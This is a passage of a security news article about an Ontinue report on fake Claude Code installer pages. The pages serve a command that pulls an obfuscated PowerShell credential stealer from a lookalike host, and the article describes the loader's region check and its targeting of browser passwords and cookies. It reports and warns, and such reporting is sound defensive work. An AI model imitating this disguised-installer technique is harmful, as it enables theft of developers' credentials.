Fake Claude Code Installer Targets Developers With Browser Credential Stealer

Researchers at Ontinue have discovered an undocumented malware campaign targeting developers with fake Claude Code installers to steal browser passwords and cookies.

A new report from the Cyber Defence Centre at Ontinue has found a campaign targeting software developers with fake installation pages that look like official sites for AI tools like Claude Code.

The attack begins when a user searches for ‘install Claude code’ and clicks on a sponsored result. This link goes to a lookalike page that shows an installation command. While the real command uses the host ‘claude.ai,’ the fake version uses ‘events.msft23.com.’

Running this command enables Invoke-RestMethod to download a 600 KB, heavily obfuscated PowerShell script. This loader first checks the Windows region settings and stops immediately if the host is located in countries like Russia, Iran, or Ukraine.

But, if the location is not on the list, the malware searches for Chromium-family ...